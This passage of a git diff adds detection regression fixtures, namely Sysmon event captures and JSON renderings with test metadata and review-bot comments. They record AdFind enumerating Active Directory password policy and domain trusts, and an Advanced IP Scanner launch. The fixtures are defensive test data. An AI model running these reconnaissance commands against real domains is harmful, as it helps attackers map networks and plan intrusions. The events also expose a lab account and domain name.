diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b5128f2c68a8022d5719aa3d22b3588ebe164362 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json new file mode 100644 index 000000000..64e79fdd7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T09:37:40.974119Z" + } + }, + "EventRecordID": 650014, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 09:37:40.972", + "ProcessGuid": "14207D89-F764-68F9-2410-000000003F02", + "ProcessId": 4316, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", + "ParentProcessId": 6488, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} 
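Review bot: This single event only exercises the `-default -s base lockoutduration ... pwdproperties` password-policy variant of AdFind enumeration; if the rule titled "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE" carries several enumeration markers, every marker not exercised here is a regression gap, so either add further samples or state in the companion info.yml which marker this event covers. Two smaller points: the `Hashes` field carries MD5, SHA256 and IMPHASH but no SHA1, unlike the hh.exe sample in this patch, so the two .evtx files come from Sysmon instances with different hash configurations (harmless for a CommandLine-based rule, but worth knowing before any regression sample is expected to match on hashes); and the event embeds a contributor's lab account and domain (`MIDGARDNET\SwachchhandaP`, `srv-01.midgardnet.tech`) where the other sample uses attackrange.local, so consider a consistent anonymised naming for committed test data.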
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml new file mode 100644 index 000000000..94621d03a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml @@ -0,0 +1,13 @@ +id: de5c7702-3eb3-41be-ae33-b36a6f13d985 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx 
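Review bot: `description: N/A` on an otherwise complete info.yml drops the one piece of context the .evtx cannot give a reader: that this event is AdFind run with `-default -s base` to read domain password-policy attributes and that it is expected to match exactly once. Replace the placeholder with a one-line description of the exercised variant. `match_count: 1` itself is the right call; the hh.exe info.yml in this patch should carry the same key so the CI script checks both samples the same way.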
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..474247e0177ddc2793fe3b0b90d2c659efc800f2 GIT binary patch literal 69632 zcmeHQ3vgW3dH(NecfDRoyAsAg0K?j806Esfdf2ip6J$MX*RqiKSFq1NEDAXmBCLM-k!fSw(M@%3IrKEvUlQ@JzQNQn;dsn;K zm29z*lb!kR&fR;?x&JxmKmYm9cmDhDId@wIds_zvdu00Ia}%z^)h7iaCC+q`oa2q} zzIS2Hg=hgP0hNGCKqa6OPzk66R01jim4He>C7=>e2^?1fErY#H{lk03d%B9PX^?2eqdA^1^ zc`QMlJl=8X|J6-r+Eb`nD_78@K(^aqRhk7${`Jp^E`)( zjb{CRXF=BFoD!EWN1sL|+5bO0*!k7TrXx<&aiqve_#ZjwamH|A)%)9*J>GqK+xX=d z-i?-!s_UrNw;C z41@G6G(f&0J|s- z8Y3Q#BI;DbfpA(6dYK@epp+IkVQ9+~mb4ZWr$~DT3M9+q#7f>52}_u~+>A^fAl&tK zp)?sX@-b*Q@x*#1=vrId5gtAomPV8~4#uf1<7lZZH?lyYL4pFiz3!1xVb!)IwrPe; z#Z;Hc$syF?fyhG-EJOpYGK}vt71{3HL_W})LSDkpEp&CZ8-!!{xLkxJ6eP5=Yj0i? zf`t2B*?IzqER;}zQ)1MKV9eu2sAv-?yP!zJhHrLSi8y}8b{bKQ9k*^cWCS$?RUmVA ztoQ=XX<#7%k(6V2u5^cVT>4NVMb9!hsF{I7pYq>;dOcu1R1rcK^WHwtTd|6q3yPqJ z(Y~!)W^mhQb)+ zVnJvK@nP9jKYHo%@4eFWowneyfm`2uVXpZr%~+%;IA*M-5rJ4DD#xLdCrDl`(_W`IBC!;>_?<yibJLZ8(;B)S!jt|9FQEnSA#ZWX;-`Lq^(g zv(Kq#9IY32}0oRT?n?GtbtHx~s>vUTXfo8GYJ>btnwyF8pS4@lrmmhU=E}qI61R&8o zqMS6&k2<#|GsW5w7R3mgDZg#sBHO+hM(0%C)KPTm z3GzFWPA#_i*%#D`B~y|Kr}67e3cljgki##886Tj$!i9B0ejH)kHR;eJSV)e5KWMOn zvK-7=b_(EhL3+|G2TF2UV0;zg4K7`|F-5DT4w$|YIT^2!7(#1c-qzr{7H19WCryof z?wZ)CUpe+}|BqpS!=Cc>12vmKb7fMu#}MwoEYXEg(Qi&W6UUL#j(g3}>gxD`hoe(K7;FUJJ0P=dn9w?B zl`MPawS({WN59m{t`YCb=a{YFG!FUh!^q!?(&}WrY=9)2@Ced~o^FCXoADsR_$r($ zk-E}Ic?0^q8MLj4^HYnwwMc1|73k$nprc-_LV2~w&pXX1w+h_WBfSZs8hlz!39PpY zv>Q+(^E8_K{BA}mYmiQTYel#QvDKidLpjYRRAXvdjZ*6oVolZNtTVY7Ujcb-g@%zQ za<(2d)T6v+#G6rGiz%J_u#GLaQ)fydPqxNYNU6s?Y8LH2O7t_(_2*n&zbvWi>DCbS zed>{{2Dz_<-VZ_Io}Mj38#zYio-c+r(Lg+LJrIEf&gbJ-zS*q&*{%CCk$+aJeiI0Oht_;Gipy@r8?$fztoK&HGGTfLu754G-UUO~!8eZB 
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json new file mode 100644 index 000000000..ab8d77e62 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T11:32:08.872401Z" + } + }, + "EventRecordID": 651803, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 11:32:08.871", + "ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02", + "ProcessId": 8080, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -s trustdmp", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02", + "ParentProcessId": 1648, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} 
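Review bot: the fixture carries contributor-specific identity in EventData (`"Computer": "srv-01.midgardnet.tech"`, `"User": "MIDGARDNET\\SwachchhandaP"`, and `C:\Users\SwachchhandaP\Downloads\AdFind\` in Image and CurrentDirectory); unless the rule under test needs those exact values, consider normalising host, domain and user to neutral placeholders so regression data does not expose a lab environment and stays uniform across samples from different contributors.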
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml new file mode 100644 index 000000000..69f9d343d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml @@ -0,0 +1,13 @@ +id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + title: PUA - AdFind Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx 
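Review bot: `description: N/A` leaves this fixture undocumented; the sample exercises the trust-dump form of AdFind (`AdFind.exe -s trustdmp` in the JSON above), so a one-line description saying so would tell maintainers which of the rule's command-line markers this single positive test covers and which remain untested.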
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0996d98ff175f3870e44323df39a027bcedba806 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json new file mode 100644 index 000000000..508e249e2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:01:48.031627Z" + } + }, + "EventRecordID": 650317, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:01:48.012", + "ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02", + "ProcessId": 2064, + "Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe", + "FileVersion": "2.5.4594.1", + "Description": "Advanced IP Scanner", + "Product": "Advanced IP Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_ip_scanner.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"", + "CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0", + "ParentProcessGuid": 